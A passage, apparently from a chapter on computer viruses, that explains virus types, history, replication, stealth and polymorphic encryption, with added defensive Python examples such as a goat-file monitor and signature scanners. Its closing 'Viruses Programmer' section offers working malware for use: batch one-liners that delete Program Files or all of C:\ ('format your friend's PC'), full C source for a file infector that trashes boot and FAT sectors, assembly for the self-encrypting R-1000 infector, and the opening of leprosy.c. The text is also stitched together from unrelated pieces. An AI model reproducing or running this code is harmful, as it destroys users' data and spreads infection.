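    .COM before .EXE before .BAT. More than one hit means an earlier entry
    shadows a later one, the path-companion case described above."""
    hits = []
    for d in path_dirs:
        if not os.path.isdir(d):
            continue
        names = {n.upper(): n for n in os.listdir(d)}
        for ext in DOS_ORDER:
            cand = (command + ext).upper()
            if cand in names:
                hits.append(os.path.join(d, names[cand]))
    return hits


def demo():
    """Constructed sample tree: a DOS directory holding EDIT.COM next to
    EDIT.EXE, and a TOOLS directory earlier on the path holding a second
    FORMAT.COM. Returns (companion pairs, directories in resolution order)."""
    with tempfile.TemporaryDirectory() as root:
        sysdir = os.path.join(root, "DOS")
        tools = os.path.join(root, "TOOLS")
        os.makedirs(sysdir)
        os.makedirs(tools)
        layout = {
            sysdir: ["EDIT.COM", "EDIT.EXE", "FORMAT.COM", "BACKUP.EXE"],
            tools: ["FORMAT.COM"],
        }
        for d, names in layout.items():
            for name in names:
                with open(os.path.join(d, name), "wb") as fh:
                    fh.write(b"stub")  # constructed, inert contents
        pairs = find_companion_pairs(sysdir)
        order = resolve_order([tools, sysdir], "FORMAT")
        return pairs, [os.path.basename(os.path.dirname(p)) for p in order]


if __name__ == "__main__":
    pairs, order = demo()
    for shadowing, shadowed in pairs:
        print(f"{shadowing} would run instead of {shadowed}")
    print("FORMAT resolves first in:", order[0])
```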
E-mail virus

An e-mail virus is a virus which uses e-mail messages as a mode of transport. These viruses often copy themselves by automatically mailing copies to hundreds of people in the victim's address book.
Logic bomb A logic bomb employs code that lies inert until specific conditions are met. The resolution of the conditions will trigger a certain function (such as printing a message to the user and/or deleting files). An example of a logic bomb would be a virus that waits to execute until it has infected a certain number of hosts. A time bomb is a subset of logic bomb, which is set to trigger on a particular date and/or time.
Macro virus

A macro virus, often written in the scripting languages for Microsoft programs such as Word and Excel, is spread in Microsoft Office by infecting documents and spreadsheets.
Cross-site scripting virus A cross-site scripting virus (XSSV) is a type of virus that utilizes cross-site scripting vulnerabilities to replicate. A XSSV is spread between vulnerable web applications and web browsers creating a symbiotic relationship.
Trojan horse

Trojan horses are impostor files that claim to be something desirable but, in fact, are malicious. Rather than insert code into existing files, a Trojan horse appears to do one thing (install a screen saver, or show a picture inside an e-mail, for example) when in fact it does something entirely different, and potentially malicious, such as erasing files. Trojans can also open back doors so that computer hackers can gain access to passwords and other personal information stored on a computer. Although often referred to as such, Trojan horses are not viruses in the strict sense because they cannot replicate automatically. For a Trojan horse to spread, it must be invited onto a computer by the user, for example by opening an e-mail attachment or by downloading and running a file from the Internet.
Worm

A worm is a piece of software that uses computer networks and security flaws to create copies of itself. A copy of the worm will scan the network for any other machine that has a specific security flaw. It replicates itself to the new machine using the security flaw, and then begins scanning and replicating anew.
Worms are programs that replicate themselves from system to system without the use of a host file. This is in contrast to viruses, which require the spreading of an infected host file. Although worms generally exist inside other files, often Word or Excel documents, there is a difference between how worms and viruses use the host file. Usually the worm will release a document that already has the "worm" macro inside the document. The entire document will travel from computer to computer, so the entire document should be considered the worm. Mydoom and ILOVEYOU are two examples of worms.
Effects of computer viruses

Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and make their presence known by presenting text, video, or audio messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.
Use of the word "virus"

The word virus is derived from and used in the same sense as the biological equivalent. The term "virus" is often used in common parlance to describe all kinds of malware (malicious software), including those that are more properly classified as worms or Trojans. Most popular anti-virus software packages defend against all of these types of attack. In some technical communities, the term "virus" is also extended to include the authors of malware, in an insulting sense. The English plural of "virus" is "viruses". Some people use "virii" or "viri" as a plural, but this is rare. For a discussion about whether "viri" and "virii" are correct alternatives of "viruses", see plural of virus. The term "virus" was first used in an academic publication by Fred Cohen in his 1984 paper Experiments with Computer Viruses, where he credits Len Adleman with coining it. However, a 1972 science fiction novel by David Gerrold, When H.A.R.L.I.E. Was One, includes a description of a fictional computer program called "VIRUS" that worked just like a virus (and was countered by a program called "VACCINE"). The term "computer virus" with its current meaning also appears in the comic book Uncanny X-Men #158, written by Chris Claremont and published in 1982. Therefore, although Cohen's use of "virus" may perhaps have been the first "academic" use, the term had been used earlier.
History

A program called "Elk Cloner" is credited with being the first computer virus to appear "in the wild", that is, outside the single computer or lab where it was created. Written in 1982 by Rich Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. This virus was originally a joke, created by the high school student and put onto a game. The game was set to play normally, but to release the virus on the 50th time of starting the game. On that occasion, instead of playing the game, it would change to a blank screen that displayed a poem about the virus named Elk Cloner. The computer would then be infected.

The first PC virus was a boot sector virus called (c)Brain, created in 1986 by two brothers, Basit and Amjad Farooq Alvi, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, possibly predated it, based on code within the virus.

Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk.

Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS and modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBSs.
Within the "pirate scene" of hobbyists trading illicit copies of commercial software, traders in a hurry to obtain the latest applications and games were easy targets for viruses. Since the mid-1990s, macro viruses have become common. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel. These viruses spread in Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most of these viruses were able to spread on Macintosh computers as well. Most of these viruses did not have the ability to send infected e-mail. Those viruses which did spread through e-mail took advantage of the Microsoft Outlook COM interface.
Macro viruses pose unique problems for detection software. For example, some versions of Microsoft Word allowed macros to replicate themselves with additional blank lines. The virus behaved identically but would be misidentified as a new virus. In another example, if two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus distinct from the "parents".

A computer virus may also be transmitted through instant messaging. A virus may send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source), follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating.

The newest species of the virus family is the cross-site scripting virus. The virus emerged from research and was academically demonstrated in 2005. This virus utilizes cross-site scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of cross-site scripting viruses in the wild; the most notable sites affected have been MySpace and Yahoo.
Why do people write and spread viruses?

It is difficult to know why people write them. Everyone has their own reasons. Some general reasons are to experiment with how to write viruses or to test their programming talent. Some people just like to see how the virus spreads and gets famous around the world. The following is a list from postings to the newsgroup alt.comp.virus, and tries to explain why people write and spread viruses.
• They don't understand or prefer not to think about the consequences for other people
• They simply don't care
• They don't consider it to be their problem if someone else is inconvenienced
• They draw a false distinction between creating/publishing viruses and distributing them
• They consider it to be the responsibility of someone else to protect systems from their creations
• They get a buzz, acknowledged or otherwise, from vandalism
• They consider they're fighting authority
• They like 'matching wits' with anti virus vendors
• It's a way of getting attention, getting recognition from their peers and their names (or at least that of their virus) in the papers and the Wild List
• They're keeping the anti virus vendors in a job

Replication strategies
In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user tries to start an infected program, the virus' code may be executed first. Viruses can be divided into two types on the basis of their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect these targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself.
Nonresident viruses

Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file. For simple viruses the replicator's tasks are to:

1. Open the new file
2. Check if the executable file has already been infected (if it is, return to the finder module)
3. Append the virus code to the executable file
4. Save the executable's starting point
5. Change the executable's starting point so that it points to the start location of the newly copied virus code
6. Save the old start location to the virus in a way so that the virus branches to that location right after its execution
7. Save the changes to the executable file
8. Close the infected file
9. Return to the finder so that it can find new files for the replicator to infect

Resident viruses
Resident viruses contain a replication module that is similar to the one employed by nonresident viruses. However, this module is not called by a finder module. Instead, the virus loads the replication module into memory when it is executed and ensures that this module is executed each time the operating system is called to perform a certain operation. For example, the replication module can be called each time the operating system executes a file. In this case, the virus infects every suitable program that is executed on the computer.

Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. For instance, a fast infector can infect every potential host file that is accessed. This poses a special problem to anti-virus software, since a virus scanner will access every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all files that are scanned. Fast infectors rely on their fast infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow down a computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. For instance, some slow infectors only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably, and will at most infrequently trigger anti-virus software that detects suspicious behavior by programs. The slow infector approach does not seem very successful, however.
Host types

Viruses have targeted various types of hosts. This is a non-exhaustive list:

• Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux)
• Volume Boot Records of floppy disks and hard disk partitions
• The master boot record (MBR) of a hard disk
• General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms)
• Application-specific script files (such as Telix scripts)
• Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)
Methods to avoid detection

In order to avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool anti-virus software, however. Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example, the CIH virus, or Chernobyl virus, infects Portable Executable files. Because those files had many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file. Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them.

As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced.
Avoiding bait files and other undesirable hosts

A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software.

Another type of host that viruses sometimes avoid is bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus:

• Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file than to exchange a large application program that has been infected by the virus.
• Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus.
• Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system.

Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'.

A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.
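The third use of bait files above, goat files that are checked regularly for unexpected change, as an added example that is not part of the original page. It plants a few constructed goat files, records their size and SHA-256, and reports any that an appending or an overwriting infector has touched, even when the infector restores the file's timestamp the way the listings later in this chapter do. The two "infector" functions are constructed stand-ins that only modify the goat files; the file names, the 512-byte goat body and the payload are assumptions.

```python
"""Goat-file monitor: bait files checked for any change in content.

Records a baseline (size + SHA-256) for a set of constructed bait files and
reports which ones no longer match. Content is compared, not metadata, so
an infector that restores the file's date/time is still caught.
"""
import hashlib
import os
import shutil
import tempfile

# Constructed bait: a tiny COM-like body (int 20h, then nop padding).
GOAT_NAMES = ("GOAT1.COM", "GOAT2.COM", "GOAT3.COM")
GOAT_BODY = b"\xcd\x20" + b"\x90" * 510      # 512 bytes


def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def plant_goats(directory):
    """Write the bait files; return the baseline {name: (size, digest)}."""
    baseline = {}
    for name in GOAT_NAMES:
        path = os.path.join(directory, name)
        with open(path, "wb") as f:
            f.write(GOAT_BODY)
        baseline[name] = (os.path.getsize(path), sha256_file(path))
    return baseline


def check_goats(directory, baseline):
    """Return {name: reason} for every bait file that differs from the baseline."""
    alerts = {}
    for name, (size, digest) in baseline.items():
        path = os.path.join(directory, name)
        if not os.path.exists(path):
            alerts[name] = "missing"
            continue
        new_size = os.path.getsize(path)
        if new_size != size:
            alerts[name] = "size changed %d -> %d" % (size, new_size)
        elif sha256_file(path) != digest:
            alerts[name] = "content changed, size unchanged"   # overwriting infector
    return alerts


def simulate_appending_infector(path, payload=b"VIRUS" * 20):
    """Constructed stand-in: grows the file, then puts the old mtime back."""
    st = os.stat(path)
    with open(path, "ab") as f:
        f.write(payload)
    os.utime(path, (st.st_atime, st.st_mtime))


def simulate_overwriting_infector(path):
    """Constructed stand-in: same length, different bytes (jmp $ then zeros)."""
    size = os.path.getsize(path)
    with open(path, "wb") as f:
        f.write(b"\xeb\xfe" + b"\x00" * (size - 2))


def demo():
    """Plant goats, 'infect' two of them, return the alerts raised."""
    d = tempfile.mkdtemp()
    try:
        baseline = plant_goats(d)
        assert check_goats(d, baseline) == {}          # clean baseline
        simulate_appending_infector(os.path.join(d, "GOAT1.COM"))
        simulate_overwriting_infector(os.path.join(d, "GOAT2.COM"))
        return check_goats(d, baseline)
    finally:
        shutil.rmtree(d, ignore_errors=True)


if __name__ == "__main__":
    for name, why in sorted(demo().items()):
        print(name, "->", why)
```

A resident monitor would run check_goats on a timer or after each program exit; what matters is that the goats are compared by content, since both listings later in this chapter carefully restore the victim's date and time.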
Stealth
Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software's request to read the file, so that the request is handled by the virus instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that the file appears to be "clean". Modern anti-virus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to defeat stealth is to boot from a medium that is known to be clean and scan the suspect disk from there, so that the virus's hooks are never loaded into memory.
Self-modification

Most modern anti-virus programs try to find virus patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.
Simple self-modifications

In the past, some viruses modified themselves only in simple ways. For example, they regularly exchanged subroutines in their code for others that would perform the same action; for example, 2+2 could be swapped for 1+3. This poses no problems to a somewhat advanced virus scanner.

Encryption with a variable key

A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Mostly, the decryption techniques that these viruses employ are simple and done by just XORing each byte with a randomized key that was saved by the parent virus. The use of XOR operations has the additional advantage that the encryption and decryption routine are the same (a XOR b = c, c XOR b = a). The R-1000 and ranger listings later in this chapter work this way: each takes the current time from DOS as the key, XORs its body with it and patches the key into its own decryptor.
Polymorphic code

Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses, however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts that stay the same on each infection, making it impossible to detect directly using signatures. Anti-virus software can detect it by decrypting the virus using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body.

Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This makes it more likely that detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.
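Signature scanning, the variable-key XOR encryption described under "Encryption with a variable key" above, and the two ways a scanner recovers from it (matching the constant decryptor stub, and the emulator-free technique anti-virus engines call X-raying), as an added example in Python that is not from the original page. The "virus body", the host bytes and the decryptor stub are constructed stand-ins, not real malware; the stub imitates lodsb / xor al,imm8 / stosb / loop with the key as its only variable byte, which is the same trick the R-1000 listing later in this chapter plays with its Crypt byte. The last sample inserts a junk nop inside the stub, as a polymorphic decryptor would, to show which detection still works.

```python
"""Signature scanning against a body encrypted with a per-file XOR key, and two
recoveries: matching the constant decryptor stub, and 'X-raying' the body by
trying every single-byte key against the signature.

All byte strings here are constructed stand-ins, not real malware.
"""

# Constructed 'virus body' with a distinctive marker, and the scanner's
# signature for it (a byte pattern taken from the body, as the text says).
VIRUS_BODY = b"\x55\x8b\xecVIRUS-BODY-MARKER\xc9\xc3" + bytes(range(32))
SIGNATURE = b"VIRUS-BODY-MARKER"

# Constant decryptor stub: lodsb / xor al,<key> / stosb / loop, with the key
# as its only variable byte (assumed encoding, for illustration only).
STUB_PREFIX = b"\xac\x34"       # lodsb ; xor al, imm8  (the imm8 key follows)
STUB_SUFFIX = b"\xaa\xe2\xfb"   # stosb ; loop back


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key; the same routine encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def make_infected(host: bytes, key: int, junk: bytes = b"") -> bytes:
    """Host + decryptor stub + body XORed with `key`.
    `junk` is inserted inside the stub to mimic a polymorphic decryptor."""
    stub = STUB_PREFIX + bytes([key]) + junk + STUB_SUFFIX
    return host + stub + xor_bytes(VIRUS_BODY, key)


def scan_signature(data: bytes) -> bool:
    """Plain signature scan: does the byte pattern appear verbatim?"""
    return SIGNATURE in data


def scan_decryptor_stub(data: bytes) -> int:
    """Indirect detection: find the constant decryptor, wildcarding the key byte.
    Returns the stub offset, or -1 if no exact stub is present."""
    i = data.find(STUB_PREFIX)
    while i != -1:
        if data[i + 3:i + 6] == STUB_SUFFIX:
            return i
        i = data.find(STUB_PREFIX, i + 1)
    return -1


def scan_xray(data: bytes):
    """X-ray: a single-byte XOR has only 256 keys, so encrypt the signature
    with each one and search for that instead of emulating the decryptor.
    A mutated stub does not matter. Returns (key, offset) or None."""
    for key in range(256):
        off = data.find(xor_bytes(SIGNATURE, key))
        if off != -1:
            return key, off
    return None


def demo():
    """Run the three scanners over constructed samples; returns
    {sample_name: (signature_hit, stub_hit, xray_result)}."""
    host = b"MZ" + bytes(range(64))                     # constructed 66-byte host
    samples = {
        "key00": make_infected(host, 0x00),             # null key: body in clear
        "key5a": make_infected(host, 0x5a),
        "keyff": make_infected(host, 0xff),
        "poly":  make_infected(host, 0x5a, junk=b"\x90"),  # nop inside the stub
    }
    return {
        name: (scan_signature(s), scan_decryptor_stub(s) != -1, scan_xray(s))
        for name, s in samples.items()
    }


if __name__ == "__main__":
    for name, (sig, stub, xray) in demo().items():
        print(f"{name}: signature={sig} stub={stub} xray={xray}")
```

The plain signature only fires for the null key; the stub match survives any key but not the mutated stub; the X-ray finds the body in every sample because the keyspace of a byte-wide XOR is small enough to enumerate, which is why real polymorphic engines moved to multi-byte, sliding and chained keys.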
Metamorphic code

To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of assembly language code, 90% of it part of the metamorphic engine.
Conclusions

There are lots of viruses in the world and new viruses are coming up every day. New anti-virus programs and techniques are being developed too. It is good to be aware of viruses and other malware, and it is cheaper to protect your environment from them than to be sorry afterwards. There might be a virus in your computer if it starts acting differently. There is no reason to panic if a computer virus is found. It is good to be a little suspicious of malware when you surf the Internet and download files. Some files that look interesting might hide malware.

A computer virus is a program that reproduces itself, and its mission is to spread. Most viruses are harmless and some viruses might cause random damage to data files. A trojan horse is not a virus because it doesn't reproduce. Trojan horses are usually disguised so that they look interesting. There are trojan horses that steal passwords and format hard disks. Macro viruses spread from applications which use macros. Macro viruses spread fast because people share so much data, email documents and use the Internet to get documents. Macros are also very easy to write. Some people want to experiment with how to write viruses and test their programming talent. At the same time they do not understand the consequences for other people, or they simply do not care. A virus's mission is to hop from one program to another, and this can happen via floppy disks, Internet FTP sites, newsgroups and email attachments. Viruses are mostly written for PC computers and DOS environments. Viruses are no longer something that just programmers and computer specialists have to deal with. Today everyday users have to deal with viruses.
Viruses Programmer

1) A simple virus

A simple virus programmed in just one sentence, just for fun.

=================cut below=============
@ECHO OFF
IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.*
===================end==================

Paste it in Notepad and give it whatever name you want, but you have to give it the .bat extension, otherwise it won't work.
2) Format your friend's PC

=================cut below=============
@ECHO OFF
DEL C:\*.* /Y
===================end==================
3) R-virus

#include
#include
#include
#include
#include

/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM
   file which CVIRUS can infect without increasing the size of the file.
   (Since this would tip off the victim to CVIRUS's presence, no file under
   this size will be infected.) It should be set to the approximate size of
   the LZEXEd .EXE file produced from this code, but always a few bytes
   larger. Why? Because this way CVIRUS doesn't need to check itself for
   previous infection, saving time.

   SIGNATURE is the four-byte signature that CVIRUS checks for to prevent
   re-infection of itself. */

#ifdef DEBUG
#define TOO_SMALL 6000
#else
#define TOO_SMALL 4735
#endif

#define SIGNATURE "NMAN"

/* The following is a table of random byte values. Be sure to constantly
   change this to prevent detection by virus scanners, but keep it short
   (or non-existent) to keep the code size down. */

char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04";

void hostile_activity(void)
{
    /* Put whatever you feel like doing here... I chose to make this routine
       trash the victim's boot, FAT, and directory sectors, but you can alter
       this code however you want, and are encouraged to do so. */
#ifdef DEBUG
    puts("\aAll files infected!");
    exit(1);
#else
    /* Overwrite five sectors, starting with sector 0, on C:, with the memory
       at location DS:0000 (random garbage). */
    abswrite(2, 5, 0, (void *) 0);
    __emit__(0xCD, 0x19);   // Reboot computer
#endif
}

int infected(char *fname)
{
    /* This function determines if fname is infected. It reads four bytes
       28 bytes in from the start and checks them against the current header.
       1 is returned if the file is already infected, 0 if it isn't. */
    register int handle;
    char virus_signature[35];
    static char check[] = SIGNATURE;

    handle = _open(fname, O_RDONLY);
    _read(handle, virus_signature, sizeof(virus_signature));
    close(handle);
#ifdef DEBUG
    printf("Signature for %s: %.4s\n", fname, &virus_signature[28]);
#endif
    /* This next bit may look really stupid, but it actually saves about
       100 bytes. */
    return ((virus_signature[30] == check[2]) && (virus_signature[31] == check[3]));
}

void spread(char *virus, struct ffblk *victim)
{
    /* This function infects victim with virus. First, the victim's
       attributes are set to 0. Then the virus is copied into the victim's
       file name. Its attributes, file date/time, and size are set to that
       of the victim's, preventing detection, and the files are closed. */
    register int virus_handle, victim_handle;
    unsigned virus_size;
    char virus_code[TOO_SMALL + 1], *victim_name;

    /* This is used enough to warrant saving it in a separate variable */
    victim_name = victim->ff_name;
#ifdef DEBUG
    printf("Infecting %s with %s...\n", victim_name, virus);
#endif
    /* Turn off all of the victim's attributes so it can be replaced */
    _chmod(victim_name, 1, 0);
#ifdef DEBUG
    puts("Ok so far...");
#endif
    /* Recreate the victim */
    virus_handle = _open(virus, O_RDONLY);
    victim_handle = _creat(victim_name, victim->ff_attrib);

    /* Copy virus */
    virus_size = _read(virus_handle, virus_code, sizeof(virus_code));
    _write(victim_handle, virus_code, virus_size);
#ifdef DEBUG
    puts("Almost done...");
#endif
    /* Reset victim's file date, time, and size */
    chsize(victim_handle, victim->ff_fsize);
    setftime(victim_handle, (struct ftime *) &victim->ff_ftime);

    /* Close files */
    close(virus_handle);
    close(victim_handle);
#ifdef DEBUG
    puts("Infection complete!");
#endif
}

struct ffblk *victim(void)
{
    /* This function returns a pointer to the name of the virus's next
       victim. This routine is set up to try to infect .EXE and .COM files.
       If there is a command line argument, it will try to infect that file
       instead. If all files are infected, hostile activity is initiated... */
    register char **ext;
    static char *types[] = {"*.EXE", "*.COM", NULL};
    static struct ffblk ffblk;
    int done;

    for (ext = (*++_argv) ? _argv : types; *ext; ext++) {
        done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH);
        while (!done) {
#ifdef DEBUG
            printf("Scanning %s...\n", ffblk.ff_name);
#endif
            /* If you want to check for specific days of the week, months,
               etc.... here is the place to insert the code (don't forget to
               "#include "). */
            if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name)))
                return (&ffblk);
            done = findnext(&ffblk);
        }
    }
    /* If there are no files left to infect, have a little fun */
    hostile_activity();
    return (0);
}

int main(int argc, char *argv[])
{
    /* In the main program, a victim is found and infected. If all files are
       infected, a malicious action is performed. Otherwise, a bogus error
       message is displayed, and the virus terminates with code 1,
       simulating an error. */
    char *err_msg[] = {
        "Out of memory",
        "Bad EXE format",
        "Invalid DOS version",
        "Bad memory block",
        "FCB creation error",
        "Sharing violation",
        "Abnormal program termination",
        "Divide error",
    };
    char *virus_name;

    spread(argv[0], victim());
    puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]);
    return (1);
}
4) R-1000 virus

;
; R-1000 Virus
;
; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Infector.
; When an infected program is started, the virus will infect all files in the
; current directory and use the time counter for its encryption. It displays
; the text "T-1000" when it is ready infecting.

Code     Segment para 'code'
         Assume Cs:Code,Ds:Code

Length   Equ Offset EndByte-Offset Main

         Org 100h

Main:    Mov Si,Offset Decrypt
         Mov Di,Si
         Mov Cl,Offset EndByte-Offset Decrypt
On2:     Lodsb
         Db 34h                          ; Xor Al,Crypt hand-encoded so the key byte can be patched
Crypt    Db 0
         Stosb
         Dec Cl
         Cmp Cl,0ffh
         Jne On2

Decrypt: Mov Ah,4eh
         Push Ax

Encr:    Mov Ah,2ch
         Int 21h
         Mov Crypt,Dl
         Mov Si,Offset Decrypt
         Mov Di,Offset EndByte+10
         Mov Cx,Offset EndByte-Offset Decrypt
On3:     Lodsb
         Xor Al,Crypt
         Stosb
         Dec Cx
         Cmp Cx,0ffffh
         Jne On3

         Pop Ax
On1:     Xor Cx,Cx
         Mov Dx,Offset Nam
         Int 21h
         Jc Einde

         Mov Ax,3d01h
         Mov Dx,9eh
         Int 21h
         Mov Bx,Ax

         Mov Ah,40h
         Push Ax
         Mov Cx,Offset Decrypt-Offset Main
         Mov Dx,Offset Main
         Int 21h

         Pop Ax
         Mov Cx,Offset EndByte-Offset Decrypt
         Mov Dx,Offset EndByte+10
         Int 21h

         Mov Ah,3eh
         Int 21h

         Mov Ah,4fh
         Push Ax
         Jmp Short Encr

Einde:   Mov Ah,9
         Mov Dx,Offset Msg
         Push Cs
         Pop Ds
         Int 21h
         Int 20h

Msg      Db 'T-1000$'
Nam      Db '*.Com',0
EndByte  Db 0

Code     Ends
         End Main
5) leprosy.c virus

#pragma inline

#define CRLF     "\x17\x14"     /* CR/LF combo encrypted. */
#define NO_MATCH 0x12           /* No match in wildcard search. */

/* The following strings are not garbled; they are all encrypted    */
/* using the simple technique of adding the integer value 10 to     */
/* each character. They are automatically decrypted by              */
/* 'print_s()', the function which sends the strings to 'stdout'    */
/* using DOS service 09H. All are terminated with a dollar-sign     */
/* "$" as per DOS service specifications.                           */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
    CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
    CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
    CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};

struct _dta                     /* Disk Transfer Area format for find. */
{
    char findnext[21];
    char attribute;
    int  timestamp;
    int  datestamp;
    long filesize;
    char filename[13];
} *dta = (struct _dta *) 0x80;  /* Set it to default DTA. */

const char filler[] = "XX";                 /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100;     /* Memory where virus code begins. */
const int virus_size = 666;                 /* The size in bytes of the virus code. */
const int infection_rate = 4;               /* How many files to infect per run. */
char compare_buf[20];                       /* Load program here to test infection. */
int handle;                                 /* The current file handle being used. */
int datestamp, timestamp;                   /* Store original date and time here. */
char diseased_count = 0;                    /* How many infected files found so far. */
char success = 0;                           /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI  */
/* Standard C, for the support functions of this program.       */

int  find_first( char *fn );
int  find_healthy( void );
int  find_next( void );
int  healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*----------------------------------*/
